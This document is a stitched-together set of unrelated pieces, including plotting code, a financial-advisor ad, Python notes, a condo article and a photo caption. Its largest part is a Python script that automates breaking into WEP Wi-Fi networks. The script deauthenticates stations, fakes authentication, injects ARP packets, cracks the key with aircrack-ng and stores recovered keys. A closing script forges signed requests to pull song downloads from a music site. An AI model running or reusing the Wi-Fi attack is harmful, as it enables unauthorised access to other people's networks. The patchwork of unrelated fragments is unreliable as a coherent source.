time = data.variables['time']
###########################################
# The time values are in hours relative to the start of the entire model collection.
# Fortunately, the `netCDF4` module has a helper function to convert these numbers into
# Python `datetime` objects. We can see the first 5 element output by the function look
# reasonable.
time_vals = num2date(time[:].squeeze(), time.units)
print(time_vals[:5])
###########################################
# Now we can plot these up using matplotlib, which has ready-made support for `datetime`
# objects.
fig, ax = plt.subplots(1, 1, figsize=(9, 8))
ax.plot(time_vals, temp[:].squeeze(), 'r', linewidth=2)
ax.set_ylabel('{} ({})'.format(temp.standard_name, temp.units))
ax.set_xlabel('Forecast Time (UTC)')
ax.grid(True)
|
In March the Lewisham Down’s Friendship and Creativity Group (DFCG Lewisham) paid us a visit with a group of nearly 30 kids and parents. They are a voluntary community group for children and families and provide activity programmes that address the development and communication families and children need to form friendships. They took part in all types of activities. Volunteer are parent carers who support each other, new members and parents who have had a diagnosis of DS pre & postnatal. Volunteers help to organise promote and oversee extra curricular, social activities and residentials.
|
class Tree():
""" implementation of a tree """
def __init__(self, cargo, left=None, right=None):
""" create a tree """
# can be any type
self.cargo = cargo
# should be also tree nodes
self.left = left
self.right = right
def __str__(self):
""" representation of a tree: tree.cargo """
return str(self.cargo)
def getCargo(self):
""" return the cargo of the tree """
return self.cargo
def getLeft(self):
""" return the left node of the tree """
return self.left
def getRight(self):
""" return the right node of the tree """
return self.right
def setLeft(self, left):
""" set the left node of the tree """
self.left = left
def setRight(self, right):
""" set the right node of the tree """
self.right = right
def setCargo(self, cargo):
""" set the cargo of the tree """
self.cargo = cargo
@classmethod
def total(self, tree):
""" recursively sums the total cargos of a tree """
if tree == None: return 0
return tree.cargo + \
Tree.total(tree.left) + \
Tree.total(tree.right)
|
Hiring a Mount Vernon financial advisor may be the key to getting your finances to where you want them, and to properly managing your money. We live in a country where residents are provided with a large number of financial opportunities. With countless banks, accounts, government programs and investments at your disposal, there is a lot that you can potentially do with your money. However, some Mount Vernon residents may find that it is difficult to effectively pick the right investments and opportunities. Choosing the right places to put your money can lead to gains, while making poor decisions can lead to losses. Rather than bouncing back and forth between losses and gains, hire an advisor to help you make the most of your income.
The financial world is one that can be fairly difficult to understand, and there are many different ways that a trained Mount Vernon financial advisor can help you with your money. By understanding the ways that you can receive help from an advisor, you can more effectively choose the New York advisors that will best fit your needs. The following are just a few of the different ways that you can receive help from a Mount Vernon financial advisor.
Some people may need the assistance of a Mount Vernon financial advisor in order to make large purchases that will have a big effect on their finances. Real estate is an example of such a purchase. When you buy a home in NY or elsewhere, you are going to be investing a large amount of money, and that investment is going to be controlled by a number of factors. Homeowners will need to find a good mortgage, an appropriate homeowners insurance policy, and will need to learn about property taxes and other expenses. With a financial advisor to help you with these important decisions, you should have no problem putting together a real estate purchase that will meet your needs.
Others are going to be searching for a Mount Vernon financial advisor that can help them with their savings. If you are currently saving for something like retirement, or a college education fund, you are likely aware of the difficulty that often comes with making these kinds of savings. Many people already have a hard time making ends meet with their paycheck, and the idea of saving large amounts of money can seem impossible. However, when you get professional assistance with managing your savings and various mixed investments, you should have a much easier time making your goals. NY advisors are going to be able to help you use different tools and programs to effectively budget and save for important life events.
Finally, many people may be looking to hire a Mount Vernon financial advisor to help them with important investments. One common investment that many people will make is that of life insurance. Whole life insurance and universal life insurance both come with a built in investment component, and a financial advisor can help you choose the best providers and policies, as well as a face value that will fit the needs of your family. Your expert should have a lot of experience with these and other kinds of investments, and can help you make your money go much further.
When you hire a Mount Vernon financial advisor, you do not want to simply rush out and hire the first advisor that you find. The individual that you employ is going to be dealing with sensitive financial matters, and you will want to find someone that is properly trained and educated. There are a number of different things that shoppers in Mount Vernon will want to look for in a New York professional.
In order to be certified to practice in Mount Vernon, a Mount Vernon financial advisor will have to meet a few different qualifications. First, they will need to have passed the appropriate certification tests. Also, a good financial advisor will need to have affiliated with a local firm, and will have to be licensed by NY state. If you locate Mount Vernon advisors that do not meet these requirements, you may be taking large risks by paying for their services. Make sure to do the proper research before making your decision.
In the past, people that were looking to hire a Mount Vernon financial advisor would have to call each of the individual firms and advisors in order to get quotes and information. Now, the process is much easier, and it will take you far less time to find the right options. Use the Internet resources that we offer here on this website to compare your choices, and then pick the New York advisors that will best fit your budget and your needs.
|
# ch03_notes.py
# Chapter 3 notes taken from Automate the Boring Stuff with Python (2015).pdf
# Created by Davidzz on 7/20/2016
# Functions:
# no parameters:
# define:
def hello():
print('Howdy!')
print('Howdy!!!')
print('Hello there.')
# call:
hello()
# with parameters:
# define:
def hello(name):
print('Hello ' + name + '!')
# call:
hello('David')
hello('Belinda')
# returns in functions
import random
def getRandomIntBetweenZeroAnd(num):
gen = random.randint(0, num)
return gen
for i in range(5):
string = str(getRandomIntBetweenZeroAnd(9))
print(string)
# null == None (N capitalized)
# printing to console
print('Pyt', end='')
print('hon')
print('Hello', 'world!')
print('a', 'a', 'a', 'a', sep = 'A')
# global Statement
def a():
global num
char = 'aaaaa'
char = 'bbbbb'
print(char)
# Exceptions
def spam(divideBy):
try:
return 42 / divideBy
except ZeroDivisionError:
print('Error: Invalid argument.')
print(spam(2))
print(spam(12))
print(spam(0))
print(spam(1))
|
More from the Arroyo series, the idea was to shoot my Watermelon Girl piece. But I had the girl, a beautiful day, and there was some nakedness happening. This girl was 19 at the time, and having a real hard time figuring life. Now as then, she is a sweet woman, and life seems to be settling down now. Anyway, high speed film, and cross-processed…, I love how the background turned out, and of course the model.
|
#!/usr/bin/env python
# - coding: utf-8 -
# Copyright (C) 2010 Toms Bauģis <toms.baugis at gmail.com>
"""Base template"""
from gi.repository import Gtk as gtk
from lib import graphics
import math
import hamster.client
import datetime as dt
from collections import defaultdict
import itertools
class Chart(graphics.Sprite):
def __init__(self):
graphics.Sprite.__init__(self, interactive = False)
def do_stuff(self, years, categories):
step = (360.0 / 365) * math.pi / 180.0
g = self.graphics
g.set_color("#999")
g.set_line_style(width = 1)
# em
colors = ["#009966", "#33cc00", "#9933cc", "#aaaaaa", "#ff9999", "#99cccc"]
colors.reverse()
# em contrast
colors = ["#00a05f", "#1ee100", "#a0a000", "#ffa000", "#a01ee1", "#a0a0a0", "#ffa0a0", "#a0e1e1"]
colors.reverse()
# tango light
colors = ["#fce94f", "#89e034", "#fcaf3e", "#729fcf", "#ad7fa8", "#e9b96e", "#ef2929", "#eeeeec", "#888a85"]
# tango medium
colors =["#edd400", "#73d216", "#f57900", "#3465a4", "#75507b", "#c17d11", "#cc0000", "#d3d7cf", "#555753"]
#colors = colors[1:]
#colors = ("#ff0000", "#00ff00", "#0000ff", "#aaa000")
hour_step = 15
spacing = 20
current_pixel = 1220
g.set_line_style(width = 1)
g.circle(0, 0, current_pixel - 2)
g.stroke("#fff", 0.2)
g.set_line_style(width=1)
for year in sorted(years.keys()):
for category in categories:
ring_height = hour_step * 3
for day, hours in years[year][category]:
year_day = day.isocalendar()[1] * 7 + day.weekday()
angle = year_day * step - math.pi / 2
distance = current_pixel
height = ring_height
#bar per category
g.move_to(math.cos(angle) * distance + 0,
math.sin(angle) * distance + 0)
g.line_to(math.cos(angle) * (distance + height),
math.sin(angle) * (distance + height))
g.line_to(math.cos(angle+step) * (distance + height),
math.sin(angle+step) * (distance + height))
g.line_to(math.cos(angle+step) * distance,
math.sin(angle+step) * distance)
g.close_path()
if years[year][category]:
current_pixel += ring_height + 7 + spacing
color = "#fff" #colors[categories.index(category)]
g.set_color(color)
g.fill()
current_pixel += spacing * 3
g.set_line_style(width = 4)
g.circle(0, 0, current_pixel - spacing * 2)
g.stroke("#fff", 0.5)
current_pixel += 3
class Scene(graphics.Scene):
def __init__(self):
graphics.Scene.__init__(self)
storage = hamster.client.Storage()
self.facts = storage.get_facts(dt.date(2009,1,1), dt.date(2009,12,31))
print len(self.facts)
self.day_counts = {}
categories = defaultdict(int)
self.years = {}
for year, facts in itertools.groupby(sorted(self.facts, key=lambda fact:fact.date), lambda fact:fact.date.year):
self.years[year] = defaultdict(list)
for category, category_facts in itertools.groupby(sorted(facts, key=lambda fact:fact.category), lambda fact:fact.category):
for day, day_facts in itertools.groupby(sorted(category_facts, key=lambda fact:fact.date), lambda fact:fact.date):
delta = dt.timedelta()
for fact in day_facts:
delta += fact.delta
delta = delta.seconds / 60 / 60 + delta.days * 24
self.years[year][category].append((day, delta))
categories[category] += 1
self.categories = categories.keys()
self.chart = Chart()
self.add_child(self.chart)
self.chart.do_stuff(self.years, self.categories)
self.connect("on-enter-frame", self.on_enter_frame)
self.connect("on-mouse-move", self.on_mouse_move)
#self.animate(self.chart, rotation=math.pi * 2, duration = 3)
def on_mouse_move(self, scene, event):
x, y = self.width / 2, self.height / 2
max_distance = math.sqrt((self.width / 2) ** 2 + (self.height / 2) ** 2)
distance = math.sqrt((x - event.x) ** 2 + (y - event.y) ** 2)
#self.chart.scale_x = 2 - 2 * (distance / float(max_distance))
#self.chart.scale_y = 2 - 2 * (distance / float(max_distance))
#self.redraw()
def on_enter_frame(self, scene, context):
g = graphics.Graphics(context)
g.fill_area(0, 0, self.width, self.height, "#20b6de")
self.chart.x = self.width / 2
self.chart.y = self.height / 2
self.chart.scale_x = 0.18
self.chart.scale_y = 0.18
class BasicWindow:
def __init__(self):
window = gtk.Window()
window.set_size_request(700, 600)
window.connect("delete_event", lambda *args: gtk.main_quit())
window.add(Scene())
window.show_all()
example = BasicWindow()
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL) # gtk3 screws up ctrl+c
gtk.main()
|
Having lived all across the country and working in fields from non-profit administration, to membership acquisition, to event coordination, Lisa was eager to join the UC Davis community in 2018. Since joining the VC Admin team, she’s played an integral role in implementing the UC Path Project, and assisted with a wide variety of other projects throughout the FOA organization. Even as she grows her skills and knowledge within the university, Lisa also seeks to pursue her love of animals as an active member of the rescue community.
|
#!/usr/bin/python
import os, signal, sys
import commands
import subprocess
import random
import threading
import socket
from ConfigParser import ConfigParser
import time
#LOG_PATH = "/media/card/caps"
#WIRELESS_DEVICE = "wlan0"
#MONITOR_DEVICE = "mon0"
MONITOR_MODE_CMD = "airmon-ng start wlan0"
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def get_hw_address(ifname):
import fcntl, struct
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
hwaddr = []
for char in info[18:24]:
hdigit = hex(ord(char))[2:]
if len(hdigit) == 1:
hdigit = "0%s" % hdigit
hwaddr.append(hdigit)
return hwaddr
def getCellInfo():
rawcells = commands.getoutput("iwlist %s scanning" % WIRELESS_DEVICE).split("Cell")
cells = {}
for celld in rawcells:
cell = {}
cell_data = celld.split('\n')
for field in cell_data:
field = field.strip()
vals = field.split(':')
#print vals
if "Address" in vals[0]:
if len(vals) < 7:
print vals
else:
cell["address"] = "%s:%s:%s:%s:%s:%s" % (vals[1], vals[2], vals[3], vals[4], vals[5], vals[6])
elif "Channel" in vals[0]:
cell["channel"] = vals[1]
elif "ESSID" in vals[0]:
cell["essid"] = vals[1].replace('"', '').upper()
elif "Quality" in vals[0]:
cell["quality"] = vals[0].split('=')[1]
if cell.has_key("essid"):
cells[cell["essid"]] = cell
return cells
def getCellByAddress(bssid, cells=None):
if cells is None:
cells = getCellInfo()
for cell in cells.values():
if cell["address"].lower() == bssid.lower():
return cell
return None
def isMonitorMode(monitor_device):
out = commands.getoutput("iwconfig %s" % monitor_device.name).lower()
if "mode:monitor" in out:
return True
return False
def setMonitorMode(wireless_device, monitor_device):
if isMonitorMode(monitor_device):
return True
print "setting device mode to 'Monitor'..."
commands.getoutput(MONITOR_MODE_CMD)
if isMonitorMode(monitor_device):
print "devine now in monitor mode"
return True
print "failed to get device into monitor mode"
return False
FAKE_AUTH_CMD = "aireplay-ng -1 0 -a %s -h 00:26:F2:B7:71:C2 mon0"
CRACK_CMD = "aircrack-ng /caps/%s.*.cap"
class NetworkInterface(object):
"""docstring for NetworkInterface"""
def __init__(self, name):
self.name = name
self.ip = None
self.mac = None
def getMac(self):
if self.mac is None:
self.mac = ":".join(get_hw_address(self.name))
return self.mac
def getDynamicIP(self, ip):
pass
def setIP(self, ip):
pass
def changeMac(self, mac):
# take interface down
# change interface mac
# bring interface back up
pass
def setKey(self, key):
pass
def setEssid(self, essid):
out = commands.getoutput("iwconfig %s essid %s" % (self.name, essid))
if len(out) < 2:
return True
return False
def setChannel(self, channel):
out = commands.getoutput("iwconfig %s channel %s" % (self.name, channel))
if len(out) < 2:
return True
return False
class AccessPoint(object):
"""represents a wireless network"""
def __init__(self, mac, log_path):
self.mac = mac
self.vulnerability = 0
self.cracked = False
self.crack_attempts = 0
self.first_seen = None
self.last_seen = None
self.age = 5000
self.channel = 0
self.speed = 0
self.privacy = "n/a"
self.cipher = None
self.auth = None
self.power = 0
self.beacons = 0
self.ivs = 0
self.lan = 0
self.ip = 0
self.id_length = 0
self.essid = "n/a"
self.key = None
self.stations = {}
def update(self, fields):
# BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
if self.first_seen is None:
self.first_seen = time.mktime(time.strptime(fields[1].strip(), "%Y-%m-%d %H:%M:%S"))
try:
self.last_seen = time.mktime(time.strptime(fields[2].strip(), "%Y-%m-%d %H:%M:%S"))
except:
self.last_seen = 0
self.age = time.time() - self.last_seen
self.channel = int(fields[3].strip())
self.speed = int(fields[4].strip())
self.privacy = fields[5].strip()
self.cipher = fields[6].strip()
self.auth = fields[7].strip()
self.power = int(fields[8].strip())
self.beacons = int(fields[9].strip())
self.ivs = int(fields[10].strip())
self.ip = fields[11].strip()
self.id_length = fields[12].strip()
self.essid = fields[13].strip()
if len(self.essid) == 0:
self.essid = "unknown"
#if self.key is None or len(self.key) < 2:
# self.key = fields[14].strip()
def asJSON(self):
d = {}
for k, i in self.__dict__.items():
if type(i) in [str, int, float]:
d[k] = i
d["stations"] = {}
for s in self.stations.values():
d["stations"][s.mac] = s.asJSON()
return d
def __str__(self):
return "ap('%s'): channel: '%s' privacy: '%s' cipher: '%s' auth: %s power: '%s' " % (self.essid,
self.channel, self.privacy, self.cipher, self.auth, self.power)
class Station(object):
"""docstring for Station"""
def __init__(self, mac):
self.mac = mac
self.first_seen = None
self.last_seen = None
self.power = 0
self.packets = 0
self.ap_mac = None
def update(self, fields):
self.first_seen = fields[1]
self.last_seen = fields[2]
self.power = fields[3]
self.packets = fields[4]
self.ap_mac = fields[5]
def asJSON(self):
d = {}
for k, i in self.__dict__.items():
if type(i) in [str, int, float]:
d[k] = i
return d
class AttackProperties(object):
"""info about the current attack"""
def __init__(self, monitor_device, inject_device, log_path):
self.monitor_device = monitor_device
self.inject_device = inject_device
self.log_path = log_path
self.log_prefix = log_path
self.aps = {}
self.historic_aps = {}
self.target = None
self.history_file = os.path.join(log_path, "crack-history.ini")
self.loadHistory()
def hasAP(self, ap_mac):
return self.aps.has_key(ap_mac) or self.historic_aps.has_key(ap_mac)
def getAP(self, ap_mac):
if self.aps.has_key(ap_mac):
return self.aps[ap_mac]
elif self.historic_aps.has_key(ap_mac):
return self.historic_aps[ap_mac]
return None
def getActiveAP(self, ap_mac):
if self.aps.has_key(ap_mac):
return self.aps[ap_mac]
if self.historic_aps.has_key(ap_mac):
ap = self.historic_aps[ap_mac]
self.aps[ap_mac] = ap
return ap
return None
def addActiveAP(self, ap):
if not self.aps.has_key(ap.mac):
self.aps[ap.mac] = ap
def clearActive(self):
self.aps.clear()
def loadHistory(self):
if os.path.exists(self.history_file):
config = ConfigParser()
config.read(self.history_file)
for section in config.sections():
ap_mac = section
if ap_mac != None:
self.historic_aps[ap_mac] = AccessPoint(ap_mac, self.log_path)
self.historic_aps[ap_mac].first_seen = config.get(section, "first_seen", None)
self.historic_aps[ap_mac].last_seen = config.get(section, "last_seen", None)
self.historic_aps[ap_mac].essid = config.get(section, "essid", None)
if config.has_option(section, "key"):
self.historic_aps[ap_mac].key = config.get(section, "key", None)
def saveHistory(self):
config = ConfigParser()
config.read(self.history_file)
for ap_mac in self.aps:
if not config.has_section(ap_mac):
config.add_section(ap_mac)
ap = self.aps[ap_mac]
config.set(ap_mac, "first_seen", ap.first_seen)
config.set(ap_mac, "last_seen", ap.last_seen)
config.set(ap_mac, "essid", ap.essid)
if ap.key != None:
config.set(ap_mac, "key", ap.key)
with open(self.history_file, 'w') as configfile:
config.write(configfile)
def setTarget(self, target):
self.target = target
if self.target != None:
self.log_prefix = os.path.join(self.log_path, target.essid.replace(' ', '_'))
else:
self.log_prefix = self.log_path
def parseMonitorLog(log_file, attack_props):
"""update our info from the log files"""
if not os.path.exists(log_file):
return
report = open(log_file, 'r')
lines = report.readlines()
#print lines
report.close()
readingStations = False
readingAps = False
for line in lines:
line = line.strip()
#print line
if not readingStations and not readingAps:
if line.startswith("BSSID"):
readingAps = True
continue
elif line.startswith("Station"):
readingStations = True
continue
elif readingAps:
if len(line) < 4:
readingAps =False
else:
fields = line.split(',')
#print fields
ap_mac = fields[0].strip()
if attack_props.hasAP(ap_mac):
ap = attack_props.getActiveAP(ap_mac)
else:
ap = AccessPoint(ap_mac, attack_props.log_path)
attack_props.addActiveAP(ap)
ap.update(fields)
elif readingStations and len(line) > 4:
fields = line.split(',')
station_mac = fields[0].strip()
ap_mac = fields[5].strip()
if attack_props.hasAP(ap_mac):
ap = attack_props.getAP(ap_mac)
if ap.stations.has_key(station_mac):
station = ap.stations[station_mac]
else:
station = Station(station_mac)
ap.stations[station_mac] = station
station.ap = station
station.update(fields)
class AirMonitor(object):
"""Monitors channels 1-12 for wireless networks"""
EXPLORE_COMMAND = "airodump-ng -o csv --ivs --write %s %s"
def __init__(self, attack_props, auto_start=False):
self.attack_props = attack_props
self.file_prefix = os.path.join(attack_props.log_path, "monitor")
self.monitor_log = self.file_prefix + "-01.csv"
self.process = None
self.aps = attack_props.aps
if auto_start:
self.start()
def isRunning(self):
try:
res = self.process != None and self.process.poll() is None
return res
except:
pass
return False
def start(self):
if self.process is None:
commands.getoutput("rm %s*" % self.file_prefix)
cmd = AirMonitor.EXPLORE_COMMAND % (self.file_prefix, self.attack_props.monitor_device.name)
self.FNULL = open('/dev/null', 'w')
self.process = subprocess.Popen(cmd, shell=True, stdout=self.FNULL, stderr=self.FNULL)
else:
raise Exception("AirMonitor already running")
def stop(self):
if self.process != None:
try:
self.process.kill()
commands.getoutput("kill -9 %s" % self.process.pid)
commands.getoutput("killall airodump-ng")
except:
pass
self.process = None
self.FNULL.close()
def update(self):
"""
self.attack_props.log_path + "-01.txt"
"""
parseMonitorLog(self.monitor_log, self.attack_props)
class AirCapture(AirMonitor):
"""Captures IVs into cap files for cracking WEPs"""
CAPTURE_COMMAND = "airodump-ng --channel %s --bssid %s --write %s %s"
def __init__(self, attack_props):
AirMonitor.__init__(self, attack_props, False)
self.file_prefix = attack_props.log_prefix
self.monitor_log = self.file_prefix + "-01.csv"
self.start()
def start(self):
commands.getoutput("rm %s*" % self.file_prefix)
cmd = AirCapture.CAPTURE_COMMAND % (self.attack_props.target.channel, self.attack_props.target.mac,
self.file_prefix, self.attack_props.monitor_device.name)
self.FNULL = open('/dev/null', 'w')
self.process = subprocess.Popen(cmd, shell=True, stdout=self.FNULL, stderr=self.FNULL)
class AirPlay(object):
"""Ability to inject packets into the wireless network we are attacking"""
ARP_INJECTION_CMD = "aireplay-ng -3 -b %s -h %s %s > %s-arp_inject.log"
DEAUTHENTICATE_CMD = "aireplay-ng --deauth %d -a %s -h %s"
FAKE_AUTHENTICATE_CMD = """aireplay-ng --fakeauth %d -e "%s" -a %s -h %s"""
def __init__(self, attack_props):
self.attack_props = attack_props
self.process = None
self.attack_props.monitor_device.setChannel(self.attack_props.target.channel)
def deauthenticate(self, count=1, target_mac=None):
"""Attempts to deauthenticate all stations or a target station"""
cmd = AirPlay.DEAUTHENTICATE_CMD % (count, self.attack_props.target.mac, self.attack_props.monitor_device.getMac())
if target_mac != None:
cmd += " -c %s" % target_mac
cmd += " %s" % self.attack_props.inject_device.name
lines = commands.getoutput(cmd).split('\n')
for line in lines:
if len(line) > 2:
if not "Waiting for beacon frame" in line: # spam
if not "No source MAC" in line: # spam
if not "Sending" in line: # spam
print "deauthentication erros: "
print "\n".join(lines)
return False
return True
def fakeAuthenticate(self, auth_delay=0, keep_alive_seconds=None, prga_file=None):
"""Fake authentication with AP"""
# setup the wireless card to be on the correct channel
# print "\tsetting channel: %d" % self.attack_props.target.channel
if not self.attack_props.monitor_device.setChannel(self.attack_props.target.channel):
print "failed to set correct channel for authentication"
return False
cmd = AirPlay.FAKE_AUTHENTICATE_CMD % (auth_delay, self.attack_props.target.essid,
self.attack_props.target.mac, self.attack_props.monitor_device.getMac())
# print cmd
if keep_alive_seconds != None:
cmd += " -q %i" % keep_alive_seconds
if prga_file != None:
cmd += " -y %s" % prga_file
cmd += " %s" % self.attack_props.monitor_device.name
lines = commands.getoutput(cmd).split('\n')
success = False
for line in lines:
if "Association successful" in line:
success = True
if "Authentication successful" in line:
success = True
elif "AP rejects open-system authentication" in line:
success = False
elif "Denied (Code 1) is WPA in use?" in line:
success = False
elif "doesn't match the specified MAC" in line:
success = False
elif "Attack was unsuccessful" in line:
success = False
# if not success:
# print lines
return success
def startArpInjection(self):
cmd = AirPlay.ARP_INJECTION_CMD % (self.attack_props.target.mac, self.attack_props.inject_device.getMac(),
self.attack_props.monitor_device.name, self.attack_props.log_prefix)
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def isRunning(self):
return self.process != None and self.process.poll() is None
def stop(self):
if self.process != None:
self.process.kill()
commands.getoutput("killall aireplay-ng")
self.process = None
class AirCracker(object):
"""runs a process that attempts to crack the network reading the captured packets"""
def __init__(self, attack_props, auto_start=True):
self.attack_props = attack_props
self.process = None
self.start()
def isRunning(self):
return self.process != None and self.process.poll() is None
def start(self, key_file=None, dictionary=None):
"""
This command starts a cracker and returns the key if it's able
to find it. Optional KeyFile can be used to specify a keyfile
otherwise all keyfiles will be used. If dictionary is specified
it will try to crack key using it (WPA2). aircrack-ng will run
quitely until key is found (WEP/WPA) or cross-reference with
dictionary fails.
Dictionary can be a string of several dicts seperated by ","
Like: "dict1.txt,dictpro2.txt,others.txt"
"""
cmd = "aircrack-ng -q -b %s" % self.attack_props.target.mac # -q for quite to only output the key if found
if dictionary != None: # Use dictionary if one is specified
cmd += " -w %s" % dictionary
if key_file is None: # If keyfile is specified us it, else use standard path
cmd += " %s*.cap" % self.attack_props.log_prefix
else:
cmd += " ", Keyfile
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def stop(self):
if self.process != None:
self.process.kill()
commands.getoutput("killall aircrack-ng")
self.process = None
def checkResults(self):
if self.process is None:
return False
output = self.process.communicate()[0]
for line in output.split("\n"):
if not line == "":
if "KEY FOUND" in line: # Key found, lets call event KeyFound
words = line.split(" ")
#print words
self.attack_props.target.key = words[3]
self.attack_props.saveHistory()
return True
return False
|
An exploration of the role of mid-rise developments in Toronto's urban fabric.
Paul Johnston just looks like he belongs around Ossington and Dundas. Clad in dark jeans, a black cardigan and black-and-white check shirt and thick-rimmed glasses, it would be easy to imagine him as the guy at the next table at, say, Pizzeria Libretto.
But it’s a Wednesday morning and Mr. Johnston of Urban Unique Homes is preparing for another day as head of the sales team on the mid-rise condominium project called Abacus. The hip neighbourhood is part of what he’s selling. Buyers have also been drawn to the sophisticated, angular design by architect Richard Witt. “They’ve been driven by the architecture of the building, unquestionably,” Mr. Johnston says.
A rendering for the Abacus at Dundas and Ossington, light-infused lofts starting in the $300,000s, with an emphasis on edgy design that suits the neighbourhood.
Beyond these things, the seven-storey Abacus is selling the idea of mid-rise condominium living itself. It’s a pioneering example of a kind of building — tall enough to boost population density of a neighbourhood, short enough not to cloak it in shadows — that the city believes will play an important role in future growth.
Says Mr. Witt, the architect, who designed Abacus while a partner at Raw Design: “The mid-rise guidelines are trying to put density, in a modest fashion, on the arterial roads of the city” without disrupting the nearby single-family homes.
Among Abacus’s neighbourhood-friendly design features is a shape that becomes narrower at the top. It reduces shadow impact while creating terraces for buyers to enjoy when the building is completed in 2014.
Dundas is one of many major streets that the city calls “avenues.” Others include Eglinton Avenue, Yonge Street and Kingston Road. These streets are lined in many places with two- and three-storey retail-plus-apartment buildings from the 19th and early 20th centuries. Experts believe many of these buildings are underperforming and ought to be pulled down.
For instance, the buildings on Dundas Street West near Abacus house few people, and are unattractive to boot, aside from a few nice Victorian façades. “You could expect someone to tie their horse up out there,” Mr. Witt jokes. “I would say the scale of the street is probably the same as when it was built in the mid-1800s.” Abacus will occupy a spot where a squat and unattractive auto body shop once did business.
Mid-rises are seen as a way to intensify these neighbourhoods while arguably improving their aesthetic appeal. The report defines mid-rises as between five and 11 storeys, but in practice most would stand between six and nine. In Toronto, the width of the street determines the maximum height of a mid-rise. So a typical 27-metre-wide street can be lined with 27-metre-tall buildings, which works out to eight storeys.
Buildings on this scale could absorb a quarter of a million new residents over the next two decades. Sites for potential redevelopment equal at least 200 kilometres’ worth of sidewalk-level frontage, counting both sides of the street. Streets reminiscent of the scale of a European city street seem to be in Toronto’s future.
Having adopted the report’s recommendations two years ago, the city has indeed eased the approvals process for mid-block mid-rises, says Calvin Brook, an author of the 2010 mid-rise report. The city reasoned that “having the rules of the game understood would help incentivize the development community to start building more of these mid-rise buildings,” he says.
It has been working. Mr. Brook, a principal of the architecture and urban planning firm Brook McIlroy, cites other examples of mid-rises done right, including the Toronto Community Housing Corporation’s charmingly geometric 85-unit building at 60 Richmond St. E. and the Corktown District development by Streetcar.
As mid-rises proliferate, they could put large chunks of the city back on the map for first-time buyers. High prices for single-family homes on the side streets had put neighbourhoods like Ossington and Dundas out of reach.
As one would expect, many Abacus buyers have been lured to the area by the restaurants, galleries and nightlife blossoming on Dundas West and around the corner on Ossington. Perhaps more surprisingly, the sales centre has seen empty nesters as well. Mr. Johnston says many of the buyers already live in the neighbourhood.
Abacus will not be a fortress of hipsterdom.
Even residents who aren’t in the market for a condo have applauded the Abacus development, literally. “At a public meeting for this project, people actually did stand up and start clapping. That’s the only time that’s happened to me so far,” Mr. Witt says.
If the mid-rise revolution unfolds as planned across the 416, time will tell whether similar buildings will slot themselves into existing neighbourhoods as seamlessly.
|
#!/bin/env python
# coding=utf8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import base64
import requests
import json
import urllib
import time
import random
import datetime
import hashlib
# 获得响应头信息中的Content-Type域
def urlOpenGetHeaders(url):
req = urllib.request.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')
page = urllib.request.urlopen(req)
html = page.getheader('Content-Type')
return html
# 获得url的源码
def urlOpen(url):
req = urllib.request.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')
if False:
proxies = ['110.73.8.151:8123', '110.73.10.78:8123', '36.249.193.19:8118']
proxy = random.choice(proxies)
proxy_support = urllib.request.ProxyHandler({'http':proxy})
opener = urllib.request.build_opener(proxy_support)
opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')]
urllib.request.install_opener(opener)
page = urllib.request.urlopen(url)
else:
page = urllib.request.urlopen(req)
html = page.read()
return html
# 根据名字、后缀和url下载到本地文件夹
def download(title,post,url):
filename = title + "." +post
with open(filename, 'wb') as f:
music = urlOpen(url)
f.write(music)
def getPostStr(pKey, song_id):
rsaKey = RSA.importKey(pKey)
cipher = Cipher_pkcs1_v1_5.new(rsaKey)
encry = cipher.encrypt(song_id)
return base64.b64encode(encry)
# 获取歌曲的实际的url
def getSongRealUrl(songidVal,timeVal,md5Val):
url = 'http://www.aekun.com/api/getMusicbyid/'
r = requests.post(url, {
'songid': songidVal,
't':timeVal,
'sign':md5Val
})
return r.content
# 将需要的数据写入本地文件
def writeStrToFile(writeStr):
print(writeStr)
with open("downurl.txt","a",encoding="UTF-8") as f:
f.write(writeStr)
f.write("\n")
# 获取最新的推荐歌曲编号
def getMaxSongs():
url = "http://www.aekun.com/new/"
html = urlOpen(url).decode('utf-8')
a = html.find('<tr musicid=') + 13
b = html.find('"',a)
result = int(html[a:b])
return result
# 获取目前已经获得的最大曲目编号
def getNowSongId(songIdInt):
f = open("downurl.txt","r",encoding="UTF-8")
lines = f.readlines() #读取全部内容
for line in lines:
if line.find('|')!=-1:
line = line.split("|")
line = int(line[0])
if line > songIdInt:
songIdInt = line
return songIdInt
# 下载歌曲的主程序部分
def downloadMusicMain():
# 获取pKey
f = open('public.pem')
pKey = f.read()
f.close()
songIdInt = 3509719
songIdInt = getNowSongId(songIdInt)
songIdInt = songIdInt + 1
maxSong = getMaxSongs()
print("start from:%s,end with:%s"%(songIdInt,maxSong))
# 3505251 |10 |2015084685 |▌▌Chillout ▌▌Losing Ground Michael FK & Groundfold -----3505251.mp3
while(False):
if songIdInt > maxSong:
break
time.sleep(10)
try:
urlOpen("http://www.aekun.com/song/" + str(songIdInt))
except ConnectionResetError:
print("Error occur")
songId = str(songIdInt).encode('utf-8')
print(songId)
songidVal = getPostStr(pKey, songId)
songidVal = songidVal.decode('utf-8')
t = time.time()
t = int(round(t * 1000))
timeVal = getPostStr(pKey,str(t).encode('utf-8'))
